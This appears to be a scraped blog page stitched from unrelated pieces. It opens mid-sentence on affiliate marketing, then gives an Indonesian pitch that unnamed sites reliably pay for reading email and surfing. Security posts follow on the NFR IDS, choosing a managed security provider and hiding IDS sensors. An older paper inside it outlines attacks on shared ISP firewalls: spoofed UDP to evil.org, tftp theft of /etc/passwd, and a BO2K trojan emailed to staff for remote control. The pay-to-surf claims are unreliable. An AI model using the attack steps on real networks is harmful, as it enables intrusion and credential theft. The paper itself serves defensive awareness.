opt-in email list which they then use as leads to refer to their affiliate sites. This is usually done via special links to the sites that identify the particular affiliate through which a visitor arrived at a certain site. The more prosperous affiliates use pay-per-click ads. The effectiveness of these ads is being eroded daily by the increasing number of fraudsters and scum artists who have invaded pay-per-click ads in droves. This has meant that out of the total click-throughs a person receives and has to pay for, an increasingly horrifying percentage are generated by fraudsters who have no intention of buying anything from the advertised web site.

Beragam cara yang bisa ditempuh untuk mendapatkan dollar dari internet mulai dari baca email, surfing, main game bahkan chatting. Kelihatannya tak masuk akal. Tapi itulah kenyataannya. Yang jadi pertanyaan, dari mana mereka mendapatkan uang untuk membayar kita ? Jawabannya mudah saja. Mereka mendapatkan uang dari perusahaan yang memasang iklan di web atau view bar mereka.Biar tidak penasaran Anda bisa mencoba beberapa situs atau program di bawah ini yang diyakini akan membayar kepada anggotanya. Sebagai tambahan, setelah (Anda mendaftar dan) uang Anda telah mencapai jumlah tertentu maka mereka akan mengirimkan bank draft check yang bisa Anda cairkan di banyak bank di Indonesia. dibawah ini ada beberapa link yang sudah terbukti membayar :

Earn Some money here

Network Flight Recorder – A New Tool for the War

2008-03-25T12:05:00.000-07:00

NFR (Network Flight Recorder available at http://www.nfr.net) is an IDS (Intrusion Detection System) that gives the users a powerful tool for the war against illegal access to your network. With the flexibility of this tool, network managers can feel a little better about who is accessing their network and where their employees are going.

How Does NFR Work? Features of NFR

The NFR Intrusion Detection Appliance (IDA) is a flexible, extensible, general-purpose tool that addresses both security and network management. NFR uses N-Code that was released to allow the users the flexibility to configure the IDA for their configuration. NFR is a programmable traffic analysis/intrusion detection engine that can be instantly updated when a new attack is discovered. Most IDS like ISS RealSecure or Axent’s Intruder Alert/NetProwler require that the vendor send out either an executable from ISS or a signature from Axent. With NFR a user can write their own request order and install it. NFR gives the users a chance to customize the IDA to their needs.

The architecture of NFR was designed as a set of components, each tailored to a specific activity. Data is gathered by one or more packet suckers, forwarded to the decision engine for filtering and reassembly, and possibly recorded to a backend for storage or statistical processing. The query interface is kept completely separate from the input data flow to minimize the performance impact

Of a users querying the system while it is collecting data. The N programming language is a derivation of an interpreted language designed years ago for use in a computer game. The interpreter operates on a byte-code instruction set that implements a simple stack machine. One advantage of this approach is that NFR filters occupy very little memory, yet are quite fast to evaluate. N is a complete programming language including flow control, procedures, variables with scoping rules, and list data types. Unlike many programming languages, however, N has primary data types such as "IP address." Since NFR's may be used on large networks, we chose to implement counter data types as 64-bit integers, to reduce the chance of overflow

Configurations:

NFR can be configured in both distributed and stand-alone configurations. In the stand-alone configuration, a single NFR station gathers and stores information. The distributed configuration places multiple remote stations on the network, and each rolls their data to a central station. Manage, query, and view alerts through the central station and as you network grows, you add a new remote for that segment. You can manage your IDA from any Windows machine on your network. Change system settings, run queries, or view and receive alerts from the location the convenient for you.

How Can You Monitor Your System?

NFR has alerts that can be configured to popup on the NFR Console. The alerts popup and make a beep on the console which require immediate attention. The alerts are sent to the NFR console and the NFR IDA Recorder. If you are not running the console, you can use the alert viewer to view the alerts at a later time.

Triggers within N-code occur upon receipt or detection of an event that the code is attached to. Events can be triggered with limitations on source, destination, ports, client or server side (if known), or patterns within the TCP stream. The syntax looks like:

filter mailtrack tcp (client, dport: 25 ) {

The filter above is a simple TCP stream trigger that will monitor the client side of SMTP connections. The "client" and "server" notion is based on the reassembly engines recollection of which system initiated the connection that is being observed.

Keywords that can be placed within an event are:

client - from the caller

server - from the called

start: "string" - begin matching

stop: "string" - end matching

opensession - on start of connection

closesession - on end of connection

port - IP port number (source or dest)

sport - source port

dport - destination port

host - source or destination address

net - source or destination network

dst - destination address

src - source address

A typical use is to configure an event to call N code for as small a subset of received data as is practical, then implement any further filtering in N code. To detect spam, for example, you might select TCP traffic for port 25/SMTP.

Components:

NFR uses an IDA engine to sniff packets from one or more interfaces on the NFR IDA. Unlike a firewall, NFR IDA engine does not actually touch the packet. It only observes them to be recorded. Events tell the NFR IDA engine to take some sort of action. Events can be a command and control message, passage of time, and an arrival of a packet. Backends is one of the components of the IDA. Within Backends, you will have Filters, which list the event that caused the NFR IDA engine to begin gathering data. Configuration Files provide information about the title of the backend and other information displayed via the NFR console. Recorders write the information gathered by the backends to files. List Recorders collects, records, and maintain a log of activity. Histogram Recorders collects statistical information in many dimensions, rather than the one dimension typically used when gathering statistics. Packages group related types of Backends together. Shared N-Code filters that perform some of the processing for the backends in the package. Configuration files provide information about the title of the package and other information displayed via the NFR console.

"Centralized firewall" problems

DISCLAIMER: This document contains untested ideas, please verify or debunk

me. Perhaps this is already old information? In any case, I would

like some (constructive) feedback.

Introduction

------------

Many Internet Service Providers (ISPs) provide so-called "centralized

firewall" services to leased line customers. This document is an attempt to

highlight problems which may be associated with such a service. Bear in

mind that the ideas have not been tested (yet).

So, what is a centralized firewall service? And what is the idea behind such

a service? Well, let's talk about the idea first. The "easy" way to add

security to a network is to place a firewall between the network to be

protected and the open one (the Internet). The problem with this solution

is that someone has to spend time watching logs, maintaining rules, apply any

patches, and keep the firewall software up-to-date. This costs a lot of time,

and in most cases, a lot of money (security professionals are usually not

cheap these days).

ISPs know this. They also know that it is unlikely that small and medium-

sized businesses (SMBs) have the time, money or expertise to invest in such

a position. The solution they sell to SMBs is the centralized firewall.

The centralized firewall leaves all the log-watching and maintenance to the

ISP, and the ISP provides some sort of report if there is an attack, and

usually some sort of weekly or monthly summary (SMB executives like to know

how "visible" they are on the 'net).

Service types

-------------

I know of three types of ISP "firewall" services. One of them is not

centralized, so will not be covered here (remote maintenance, where there's a

physical firewall at the customer's site, owned and maintained by the ISP).

The two other types are based on a "real" firewall (such as Firewall-1) or

by using access-control lists (ACLs). The two figures below outline the

(usual) configuration for both solutions. Figure 1 describes the solution

using a true firewall, and figure 2 a solution using access-lists. The two

solutions usually reflect the price of the service. Leased-line customers

usually have the benefit of a "true" firewall, while dial-up customers are

given the ACL option.

{Internet} (5) {Internet} (3)

| |

+-------------+ +---------------+

| Core router | (4) | Access Router | (2)

+-------------+ | w/ ACL |

| +---------------+

+-------+ | | | ISDN lines

| Fire- | (3) | | |

| wall | +------+ | +------+

+-------+ | Cust | | | Cust | ...

| +------+ | +------+

+--------+ |

| Access | (2) +------+

| Router | | Cust | (1)

+--------+ +------+

/ | \ Leased Lines

/ | \

+------+ +------+ +------+

| Rtr | | Rtr | | Rtr |

+------+ +------+ +------+

Figure 1 Figure 2

As you can see, there is a great deal more hardware involved when involving

a firewall than just relying on ACL's on the access router (hence the

difference in price). Both setups, however, have the same basic functions. In

figure 1, the traffic is only allowed to travel in the following manner:

(1) -> (2) -> (3) -> (4)

Policy routing ensures that traffic going from the customer _has_ to pass

through the firewall, thus prohibiting inter-customer traffic at level 2.

In figure 2, one uses "reflexive access-lists" (RACL, introduced in Cisco IOS

11.3) to make sure that traffic cannot pass from one customer to another

without passing through the ACL. TACACS+ or RADIUS determines which customer

should have this ACL installed (the ACL is defined in the router

configuration, not in the TACACS+ or RADIUS configuration file). Depending on

the ISP's setup, either a separate RACL will be installed for each customer,

or every customer uses the same RACL. This document assumes the latter.

It may be possible to use standard (extended) ACLs, but the idea behind RACL

is that timeouts are introduced in a kind of "state table". A standard ACL

doesn't have this; it validates packets using static rules.

For more on RACLs, check out http://www.cisco.com/univercd/cc/td/doc/product/

software/ios113ed/113ed_cr/secur_c/scprt3/screflex.htm (no spaces in this

URL).

Where is the problem?

---------------------

Both the firewall and the router containing the RACL uses some form of "state

table". This table defines what packets have left the inside, and usually

contains the following information (at least):

Source IP

Source port

Destination IP

Destination port

The router or firewall determines what packets are allowed through from the

outside depending on this table. TCP packets destined for the inside cannot

have the SYN flag set (unless specified in the filter rule), and are discarded.

UDP packets are not allowed through unless:

a) specified in the RACL

b) a UDP packet has been initiated from the inside first AND

c) the UDP reply has been received within a predefined time limit

Timers are used to invalidate UDP "sessions", since there is no way of knowing

when a UDP session ends (without looking at the overlying protocol).

This sounds innocuous enough if you are the only user of the firewall (this

is what happens when you have your own). However, in the above context, several

networks share the same firewall, and indeed, the same state table. If we

assume that all the customers are Nice(tm), then there shouldn't be a problem.

We should be paranoid, though, and consider the following scenario. What if

Customer-2 really dislikes Customer-1? In fact, how about Customer-2 (mean.com)

dislikes Customer-1 (nice.com) so much that Customer-2 gets in touch with

Mr. Evil (evil.org) on the Internet? See figure 3 for a quick situation

overview.

+----------+

{Internet}----| Mr. Evil | evil.org

| +----------+

+----------+

| RACL/ |

| Firewall |

+----------+

/ | \

+--------+ +--------+ +--------+

+--------+ +--------+ +--------+

nice.com mean.com

Figure 3

Staging the attack

------------------

Since they all share the same state table, Cust-2 could inject fake UDP packets

containing Cust-1's source IP and Mr. Evil's destination IP. Let's place

ourselves in Mr. Mean's shoes and make a coordinated attack on nice.com.

First, we call up Mr. Evil, or indeed, we just log into an account at evil.org,

that way we don't have to pay anyone to do our dirty deed.

Then there are a few ways we can do the next stage. If we know that nice.com

is comprised of UNIX machines, we could try exploiting the possibility of

poorly configured tftpd(8) servers. Gaining unauthorized files using tftp(1)

is a very old attack, as we well know. However, tftpd(8) servers are

surprisingly often present on networks that rely on firewalls to protect them.

I am quite sure there are some other remote exploits we could use; rpc.statd

or rpc.mountd perhaps. tftp(1) is used as an example as it is an easy thing

to describe. Anyway. Back to our dirty deed.

We send the following spoofed packets from mean.com:

src_ip:src_port dst_ip:dst_port

1.nice.com:69 evil.org:31337

2.nice.com:69 evil.org:31337

3.nice.com:69 evil.org:31337

254.nice.com:69 evil.org:31337

From evil.org we fire up nmap[1] as root, and tell it to scan for machines

1-254.nice.com using source port 31337 and destination port 69. We (hopefully)

get a few results back. It is probably a good idea to start the nmap scan

fairly soon after we inject the spoofed packets through the firewall/RACL as

the state table won't keep the UDP traffic valid for very long.

When we have a list of usable tftpd(8) servers, we fire up our patched version

of tftp(1) which will let us issue requests with predefined source ports (in

this case 31337).

That's about it. The firewall will (if all goes to plan[2]) let the traffic

through, and if there are any ill-configured tftpd(8) servers there, we might

be able to grab /etc/passwd (or perhaps their gateway-conf[3] files).

Another attack

--------------

We could also stage an attack against a Windows network, but the attack

outlined below doesn't implicitly need mean.com. An attacker from evil.org

could do the same attack without having help from the "inside", i.e. there

would no need for a port forwarder on evil.org; one could just fire up the

BO2K administration software there. (I ran out of ideas here, ok? Perhaps one

could stage a NetBIOS attack or something.)

Set up a port forwarder on evil.org, which points UDP port 1138 to

salesguy.nice.com port 53. Netcat (hobbit@avian.org) can be used for this.

1) Send an email to some of his employees (phone up nice.com's

switchboard for the email of a sales person).

2) Send "Dancing Pigs" + BO2K attachment to sales guy. Configure BO2K

to use UDP on port 53 (perhaps using this port will not seem

too suspicious in any firewall logs, as it could be confused with

a regular DNS request).

3) Wait for BO2K to install itself (SpeakEasy or ButtTrumpet will

tell us when this has been happened).

Send the following fake UDP packet from mean.com:

src_ip:src_port dst_ip:dst_port

salesguy.nice.com:53 evil.org:1138

Start our BO2K administration software, and connect to evil.org:1138. We

should[2] now have control over salesguy.nice.com.

Conclusion

----------

Historically, it has been well documented in security papers that UDP is a

very difficult protocol to handle securely. Despite this well known fact, more

and more applications have been built on this weak foundation. The reasons

vary, but the truth is that UDP is a very simple (and fast) protocol to base

higher level protocols on.

Customers should not rely solely on the protection offered by the ISP when

purchasing this type of service. This paper has discussed two attacks against

a poorly implemented "centralized firewall", with a few hints towards other

attacks. It should be clear that this is a very real threat. Failure to

recognize this fact could lead to a very embarrassing compromise.

It is imperative that there's some form of spoofing protection in place on

the company's border perimeter. In figure 1, this can easily be achieved by

using regular ACLs on the Access Router (2). Without having delved too deep

into the matter, it is possible that CEF[4] could be used too. CEF, however,

does not work on all Cisco IOS routers; consult your manual.

If RACLs (figure 2) are used, the ISP can prevent spoofing by using separate

RACLs for each customer. This, however, can become a huge configuration issue,

depending on how many dial-up customers the ISP has.

Addendum

--------

It should also be noted that some ISPs also provide a hosting service with

"firewall protection". Figure 4 shows a general overview.

{Internet}

+--------+

| Router |

+--------+

+----------+

| Firewall |

+----------+

+------+ +--------+ +------+

| Cust |---| Switch |---| Cust |

+------+ +--------+ +------+

+------+

| Cust |

+------+

Figure 4

The "Cust" machines are customer servers, with perhaps one or more of the

following scenarios:

- owned by ISP, customer has no root access

- owned by ISP, multihomed, customers have no root access

- owned by customer, customer has root access

When the machine is owned by the ISP, there is a distict possibility that

the ISP will try to confine the customer to a "safe"[5] environment.

Usually the customers are separated from each other on a switch with VLANs to

prevent them from attacking each other. However, if the theory described above

works, there is no reason the tricks described in the attack section shouldn't

apply here.

[1] Infamous scanner written by Fyodor (found at http://www.insecure.org).

[2] Of course, as I disclaimed in the beginning, only if this theory works!!

[3] "-conf" is the usual extension used by Cisco router configurations.

[4] Cisco Express Forwarding (http://www.cisco.com/univercd/cc/td/doc/

product/software/ios112/ios112p/gsr/cef.htm#xtocid262640). A layer 3

switching mechanism.

[5] Probably exploitable.

Managed Security Services: an IDS solution

2008-03-25T12:03:00.000-07:00

In this age of highly networked computers, e-business success can only be achieved by protecting valuable business assets: from the organization’s information, or research and development projects and highly skilled professionals that make it happen, to the IT infrastructure that we all have grown to depend on for all aspects of e-business. Protecting the organization’s assets is a matter of saving money and protecting well-guarded prestige. Such protection can only be achieved with a forward-thinking approach of planning, prevention and timely implementation of security measures.

Intrusion detection systems (IDSs) form an important component of this prevention and protection effort, as one layer in the defense in-depth approach, by aiding with automated monitoring and analysis of events in computer systems and networks. Like any other IT-based solution, it is only as good as the organization’s effort to implement, maintain and operate it. The core component for this operation is the analyst who actually makes sense of the numerous outputs and builds on previous experience to achieve the best tool of defense in this prevention/protection mechanism.

Outsourcing as a solution

Companies face a variety of challenges with the ever changing technology on which their communications infrastructure is based, and fulfilling the staff requirements to support it. Some organizations do not have enough IT staff, especially in the security arena, to spare even a few individuals to administer yet another system of computers. Network and system administrators are just too busy keeping the operations working. Other security professionals have their resources prioritize looking at the bigger picture and planning other e-business initiatives, such as VPNs and PKI, essential to many organizations.

For the highly enterprising security professional, going about doing the research to find the solution that best suits the organization’s needs for an intrusion detection system implementation, procuring the needed hardware and software and, installing IDS components is just the beginning. The initial research, acquisition and deployment is followed by numerous hours of data and correlation analysis, and keeping up with IDS system updates, technology and the infrastructure that it is designed to protect. For the organization, owning the implementation of an intrusion detection systems means capital investment on hardware and software and, requiring staffing support around the clock to respond to intrusions as real-time emergencies, a problem resolution escalation procedure and specialists to fill the various levels of expertise required for this operation, analysis and problem resolution.

Acquiring services from a managed security services provider (MSSP) comes as an alternative to the corporate investment in specialized hardware and software. Also, with staffing limitations that many organizations face, the implementation of an intrusion detection system, given what was discussed earlier, may seem more a burden than a necessary step toward a comprehensive security solution.

There is always room for entrepreneurial efforts that provide something that is needed to the organization that does not have the resources to implement and support an intrusion detection system. Still, management needs to task the security professional to find the solution to defining what is wanted and required, and how to go about obtaining and supporting it.

A word of caution for those exploring acquiring a managed security services provider as the IDS solution for the organization: do not be confused between managed security services providers (MSSPs) and managed security providers (MSPs). The latter may provide many security related services, but not necessarily installation, administration and monitoring of sensors, data analysis and incident forensics. Still managed security providers may support the development and implementation of many security initiatives for which the organization does not have resources or in-house know-how.

Managed Security Services Providers as a Solution

Managed security services providers facilitate hardware, software and services to manage and improve on the organization’s network and system security. Hardware and software provide the basis for sensors or data collectors. Sensors may be network-based which collect network packets as data, or host-based which collect system log entries and/or operating system audit trails data. MSSPs provide services to design, deploy, manage and monitor an intrusion detection system for a customer organization that does not possess the staff or other resources to provide such essential service for themselves.

At the core of managed security services monitoring is the security operations center (SOC) where data collected from the sensors is merged, normalized and analyzed. SOCs are staffed 24x7 with analysts as the first step in the escalating process of evaluating suspicious events registered by the intrusion detection system and determining an appropriate handling response. There are various levels of analysis done to the data in the effort of determining if an event is an actual intrusion incident: data mining and correlation techniques are performed including aggregation of events and incidents recorded from other customer sites as well as global incident response centers.

By the way, when it comes to monitoring, alert and incident handling coverage provided by the SOC, don’t think that services are any more comprehensive if a managed security services provider happens to mention that they provide 24x7x365 monitoring as opposed to simply 24x7. The 365 sounds impressive, but it adds no additional meaning nor coverage. Actually, this could be a dangerous thing: consider what would happen to the 366^th day in a leap year…

Considerations When Selecting an MSSP

There are many aspects to consider when selecting a managed security services provider. The organization must identify its security needs to find a provider that can meet them. Not all considerations may be important to an organization because it will depend on resources needed and wanted.

Your organization and the selected MSSP will draw a service level agreement which determines the level and quality of service to be provided by the MSSP and expected from the organization. The service level agreement needs to be negotiated in advance for a clear understating of services and cost.

MSSPs offer various pre-packaged service level agreements that might fit your organization’s needs or can be customized to the specific needs.

Here are some aspects to consider on the road of identifying the organization requirements and selecting a managed security services provider:

Technology. Managed security services providers offer a variety of technical solutions through software and hardware from various vendors. The solution that is best for your organization will be largely dependent of how much control or hands-on your organization wants, requires and can afford. Another aspect of the same issue is how much the managed security service provider is able to provide. The two hold an inversely proportional relationship. The systems and network infrastructure where the IDS will reside is a deterministic factor as well.

Consider some details on the technical requirements:

· Network-based sensors deployment and support. Network speed must be taken into consideration since sensors need to keep up with the data that are trying to collect.

· Host-based sensors deployment and support. Host-based sensors analysis is another aspect of defense in-depth, therefore it should be an integral part of the IDS and the data correlation analysis performed.

· Sensor management. Hands-on support in your organization and the MSSP’s technical capacity to remotely manage sensors are factors in this matter

· Sensor signature upgrade capabilities and timing. Depending on the specific implementation, the product(s) deployed may have capabilities for signature development. Signatures updates can be supplied by the IDS software vendor or by MSSP support for quick implementation and protection.

· System tuning. System tuning is an on-going process to minimize false-positives, which is essential to focus efforts on actual intrusions. MSSPs may consider a pilot phase to establish a base level of event activity that would be used for an initial fine-tuning of the system.

· System scalability. Even in a modest IDS initial deployment, the planning for future sensor deployment and integration should be considered from the start by the organization.

· Technical training. If your MSSP provides basic monitoring and alerting, based on your service level agreement, technical training may be required for your organization’s analyst who is left with many tasks to support hardware and software components, signature updates and development, and basic sensor maintenance.

Reporting. There are two types of reporting that an organization should consider:

· Alert reporting. There are some choices or requirements that may need to be implemented to comply with the organization’s policies: phone notification, e-mail notification, paging, SNMP trap and web portal notification. Timing of alert notification must certainly be considered and can be related to already developed incident handling policies and procedures.

· Statistical and other reporting. Even when the managed security services provider is doing the analytical work and correlation, still as a conscious analyst in your organization, there are many benefits from knowing what type of events are being detected by the intrusion detection system to plan for better security measures. A secured web portal interface can aid the analyst on this task by providing statistical reporting while protecting the information being shared.

Incident handling reporting also may help the analyst in the effort to document the organization’s intrusion incidents and to justify future acquisition and implementation of security measures, in addition to the current MSSP expense.

Regular monthly reports are a good way to keep abreast with IDS upgrades and can provide security advisories for newly discovered threats.

Incident handling and forensics. Support may be beyond monitoring and alerting. Data forensics is needed to understand the event, the extent of any damage done, possible fixes and mitigation steps. This aspect will depend on the organization’s incident and escalation procedures for intrusion incidents. The organization may also need on-site support in case of an intrusion incident and possible legal counseling and support.

Company’s assessment.

· On their own or with a partner. Various MSSPs provide the whole range of services or partner with another company to supplement the security services for the customers.

· Corporate history and growth. Knowing how long the company has been established as a MSSP, number of employees, and growth over time may give the organization some prospective on what to expect, especially if the organization plans to expand services beyond the initial deployment. Also, having an idea of other corporate customers would provide some comfort level on the MSSPs background and capabilities to satisfy the organization’s needs.

· Location and operations. Location may be a factor if your organization requires on-site support because travel expenses will be reflected in services’ cost. Inquire about SOC redundancy of operations since your organization will entrust a critical component of security to the MSSP.

· Personnel background. MSSPs take great pride in having on board former employees from the Department of Defense and other government agencies that specialize on intelligence work. Many analysts may also hold current certifications available for security professionals. In addition, it is wise to understand or require a certain level of background checks and/or clearances for analysts and staff that will be supporting your organization’s security efforts.

Security services beyond IDS. To complement intrusion detection system monitoring, MSSPs facilitate development of security policies and procedures, as well as, a more proactive approach to security measures to determine and correct vulnerabilities before an intruder’s exploit. This proactive approach include vulnerability assessment/scanning and penetration testing:

Vulnerability assessment/scanning. Assessing the strength and implementation of security controls on systems and network can be performed with vulnerability assessment tools. Some of these tools are active in nature because they identify vulnerabilities using exploit techniques.

Other vulnerability assessment may be performed in a passive mode, where security weaknesses may be encountered by reviewing security measures developed and implemented by the organization such as security policies and procedures, access controls and, roles and responsibilities. Even when data needs to be gathered from production systems, the tests are performed off-line without affecting the systems’ performance.

Both types of vulnerability assessment approaches may assess important security controls such as password strength, file systems protection, system security-related bug-fixes and access control lists.

Penetration testing to find security holes before intruders do is always good practice. Your organization may prefer to have the penetration testing performed by a third party company. This will not only test for security weakness in targeted systems but a test on the intrusion detection system implementation as well.

The scope of any penetration testing and vulnerability assessments to be performed should be identified in advance to minimize impact to the systems and networks being tested.

Cost. This will greatly depend on the service level agreement your organization develops with the selected MSSP. Service level agreements range from simple sensor monitoring and alerting to sensor implementation design and deployment, incidence forensics, vulnerability assessments, penetration testing and others indicated in this document.

Consider the number and type of sensors to be deployed and monitored and, the extent of the initial targeted IDS implementation. There could be a significant difference in the cost of host-based versus network-based sensors and how extensive the support requested from the MSSP to maintain the IDS.

Also, MSSPs also provide hours of consulting services to satisfy other security needs from customers in an effort to provide comprehensive security services.

Some final thoughts

There is a wide range of outsourcing alternatives to implement an intrusion detection solution that fits your organization’s needs. Managed security services providers satisfy many requirements with specialization and solid expertise in the security field.

Selecting a managed security service provider may prove to require low initial investment and faster deployment than a solution developed and supported only with in-house resources because of the high cost of ownership.

The organization needs to decide between technical and policy requirements, in addition to budget and technical constraints to find and acquire a provider best suited for the job at hand. Maybe the major challenge on acquiring MSSP is knowing what the organization wants and needs before the organization actually gets it.

Evading Passive Sniffer Detection With IDS Sensors

2008-03-25T12:00:00.000-07:00

As Intrusion Detection (ID) technology has progressed, so too has it been increasingly considered a viable aspect of the "defense in depth" ideology. While ID may not necessarily be viewed as a definitively mature technology, there are certainly a multitude of options from which to choose. Each of the available Intrusion Detection Systems (IDS) offers a unique combination of capability, configuration options, and, of course, price.

For the purpose of this discussion, the examples will apply directly to Shadow (the Secondary Heuristic Analysis for Defensive Online Warfare, distributed by the Naval Surface Warfare Center and available from http://www.nswc.navy.mil/ISSEC/CID/) running in the Linux environment. Network Intrusion Detection: An Analyst’s Handbook, 2^nd Ed., cites Snort (http://www.snort.org) by Martin Roesch as having "outstripped Shadow just since December 1999" (Northcutt, et al. 190); however, as Shadow is tcpdump-based the concepts are fundamentally easier to illustrate.

So Where Is The Problem?

Quite simply, Intrusion Detection Systems make for fairly strategic targets when their presence is discovered during network reconnaissance. One article, published in The Institute of Electrical and Electronics Engineers (IEEE) Software Magazine, actually asserts that "[s]mart intruders who realize that an IDS has been deployed on a network they are attacking will likely attack the IDS first, disabling it or forcing it to provide false information (distracting security personnel from the actual attack in progress)." (Allen, et al. 47)

And why shouldn’t they? After all, an IDS sensor holds great potential for the assailant who can subvert it. In addition to allowing an outsider the ability to manipulate or censor log files to conceal his or her own presence, I would assert that the sensor contains a repository of packet capture data that likely offers a wealth of information about network topologies, user accounts, and passwords.

Further, once the sensor is captured, the attacker has free and clear access to a passive packet capture device without having to arouse any unnecessary suspicion; a network scan that reveals your IDS sensor in promiscuous mode is hardly noteworthy. Similarly, there is no need for the attacker to sanitize /var/log/messages because entries that show the adapter changing into and out of promiscuous mode appear equally innocuous.

What Can I Do To Prevent This?

Perhaps the best approach to reducing this threat is to first make a cursory examination of the tool set used to identify an IDS sensor. An understanding of a tool’s principle of operation is key in determining how to defend against it.

For instance, the Neped (NEtwork Promiscuous Ethernet Detector) utility, distributed ca. 1998 by the Apostols group and included in several older revisions of the Trinux toolkit (http://www.trinux.org; NOTE: more recent versions have replaced Neped with the more diverse Sentinel utility available at http://www.packetfactory.net/Projects/Sentinel), exploited a flaw in the manner in which some older (specifically 2.0.x and 2.1.x) Linux kernels responded to ARP requests. When in promiscuous mode, a box would reply to an ARP request regardless of the intended recipient. If one were to include this relatively compact (205 line) utility as part of a rootkit to be uploaded to a compromised site, Shadow in its infancy (remember, this was 1998) would likely have been running on one such affected kernel and thus the locations of the sensors would be immediately evident to an attacker.

So how would this have been combated? The easiest manner in which to avoid such detection would have been to first append the /etc/sysconfig/network-scripts/ifcfg-eth0 to include a line similar to:

NOARP=yes

Then, edit the /etc/sysconfig/network-scripts/ifup script to include a branch similar to:

if [ -n “$NOARP” ]; then

               ifconfig ${DEVICE} -arp

fi

NB that the name of variable is fairly inconsequential so long as it does not conflict with any of the predefined variables accounted for in the network configuration script, as is its value; it is simply a mechanism by which the branch is activated. Once activated, this branch disables ARP resolution entirely on the sensor, thus evading Neped detection.

Unfortunately, since the days of Neped there have been many advances in passive sniffer detection. Tools such as bind’s Sentinel (cited earlier) or AntiSniff (http://www.securitysoftwaretech.com/antisniff/) developed by LØpht Heavy Industries use a battery of tests to discern the existence of packet capture devices on the network. AntiSniff 2.0, currently under development, will run on Win9x (consequently, sensor detection can be performed without a permissions structure from any accessible console), WinNT/2000, and *NIX (command line versions may be run remotely on a compromised system). Additionally, this revision "is being designed to work not only on local network segments but also across routers and switches." (S.S.T., Technical Details n. pag.)

The "Technical Details" page for AntiSniff 1.x breaks out the tests into several categories. It first prods the Operating System for flaws in the handling of various packet types. Packets are created to address the Linux ARP flaw examined by Neped, a similar ARP flaw in NetBSD, and a broadcast Ethernet flaw in Win9x/NT. The next round of tests forges packets to provoke a reverse DNS lookup on fictitious addresses; the premise here (simplified, of course) is that if a machine is not in promiscuous mode then it will not process a packet with a destination IP not its own and thus there will be no DNS request if a sniffer is not present. The final round of tests benchmarks the network and specific boxes at a baseline level and under duress (i.e., during periods of substantial network traffic). Theoretically, a machine discarding all packets destined for IP addresses not its own at the link layer should not exhibit significantly different performance metrics during periods of forced network congestion, provided said congestion is not directly addressed to that box.

Several aspects of packet capture detection have been built into AntiSniff; however, not one is indefensible where IDS sensors are concerned. While the methodology employed by AntiSniff is by no means canonical (i.e., there are other, less effective methods of sniffer detection not incorporated into AntiSniff 1.x), similar defensive tactics would apply.

Going back to our original example of Shadow running on a Linux platform, the Neped discussion has already addressed the ARP test. While this is not applicable on all Linux or BSD kernels, a little preventative medicine never hurts.

The DNS issue may be dealt with similarly by altering the Shadow configuration as follows in /usr/local/logger/sensor/start_logger.pl:

# Prepare the parameters to pass to the tcpdump program.

   $param =  “$PROGPAR -n -s 4096 -w - -F $FILTER”;

   $param .= “ 2>>$LOGDIR/tcpdump.err | $GZIPPROG > $TCPLOG4 2>/dev/null”;

The addition of the ‘–n’ parameter disables DNS resolution while the logs are being collected. An alternate solution would be deleting the /etc/resolv.conf file thereby disabling DNS resolution altogether. Once the logs have been transferred, either to the analyzer or an intermediate "safe" host, DNS information can be added into the logs on an "as needed" basis without altering the original by:

tcpdump –a –r tcp.2001030101 > tcp.2001030101.dns

Dealing With Latency Tests

The latency test is perhaps the most effective in the AntiSniff arsenal; no addressable production system will escape this test. The significant qualifier here is "addressable." The AntiSniff "Goals and Purpose" statement is pretty clear that "[i]f a machine on the network has no IP address, no IP stack associated with any of its interfaces, or has no ability to be communicated with over the network then AntiSniff will not detect it. This is perfectly acceptable, as such a machine would not be compromised over a network in the first place." (S.S.T., Purpose n. pag.)

The beauty of a non-addressable IDS sensor is that it provides a virtually undetectable monitoring capability (the "virtually" caveat is included for various reasons, not the least of which is that anyone having physical access to the infrastructure may notice the "extra" box that displays the promiscuity status of an adapter on the console once an hour). A scan of the IP range will not give up the location of the sensor, and its existence is equally difficult to discern with passive sniffer detection utilities.

This configuration will require, first and foremost, that a second Ethernet adapter be installed in the sensor. The key here is that this second adapter is not to have an IP address bound to it. Unfortunately, most modern Linux distributions have a very well-meaning feature that brings adapters lacking addresses down after boot; however, this is easily remedied.

The "quick and dirty" solution would be to add the following as the last line of the ‘start)’ section of /etc/rc.d/init.d/network:

ifconfig eth1 up

The more elegant solution would be to modify the network scripts such that they allow for an adapter without an IP address. Linux does not create a configuration file for an address without an adapter, so:

cd /etc/sysconfig/network-scripts/

cp ifcfg-eth0 ifcfg-eth1

Having done that, edit ifcfg-eth1 and remove the IPADDR, NETMASK, NETWORK, and BROADCAST entries. Edit the remaining entries such that DEVICE=eth1, ATBOOT=yes, and BOOTPROTO=none. Finally, append an entry to ifcfg-eth1 that is similar to:

NOIPADDR=yes

Then, edit the /etc/sysconfig/network-scripts/ifup script to include a branch similar to:

if [ -n “$NOIPADDR” ]; then

               ifconfig ${DEVICE} up

fi

As in the case of the ARP example, the exact variable name is unimportant so long as there is no duplication. The preferred placement of this branch is immediately before the ‘else’ statement to which "regular" adapters with pre-specified IP addresses fall through.

It should be noted that this modification negates the impact of the ARP and DNS modifications, as neither applies when a machine is not addressable. In other words, this change supercedes the other solutions addressed previously.

If the sensor is on an insecure hub (e.g., at the perimeter, in the DMZ, etc.) and your threat model includes only outside attacks, eth0 of this sensor can tie back into your internal network. If there is a considerable internal threat, it may be advisable to implement an isolated network for your sensors and analyzer that is non-routable from all internal and external subnets. As per usual, there is a trade-off here between usability/accessibility and security, to be determined by each individual circumstance.

For The Truly Paranoid…

It is possible to take this to yet another level. Those of us that have worked with 10Base5 Ethernet (i.e., AUI or "thicknet") before may remember a method of trimming connector pins or cable conductors to create a "receive only" connection. Be careful with this; if installed incorrectly, a modified cable could result in a "transmit only" system that would prevent the collection of any data. Pins 3 and 10 of the AUI connector are responsible for establishing the transmit connection; if the connections are physically severed, it is electrically impossible for that connection to transmit data. It is worth mentioning here that with a set of complicated equations and some equally complex monitoring equipment it may be possible to determine that there is a "receive only" system operating on a network from its electrical characteristics; however, to my knowledge this is not possible without physical access.

NOTE: I would advise against applying this principle to twisted pair Ethernet cabling. After some frustration and several support calls to equipment manufacturers, you will soon discover that most twisted pair devices will not produce a link when the transmit pair is cut as there are line verification routines within most modern enterprise-grade interconnection equipment (e.g., hubs, switches). Rumor has it that this configuration is possible with 10/100BaseT, although it may not be worth the potential sacrifice of your data’s integrity. Several 10Base5 NICs are still commercially available, as are AUI transceiver modules for hubs (e.g., the 3Com 3C1206-0).

In Conclusion

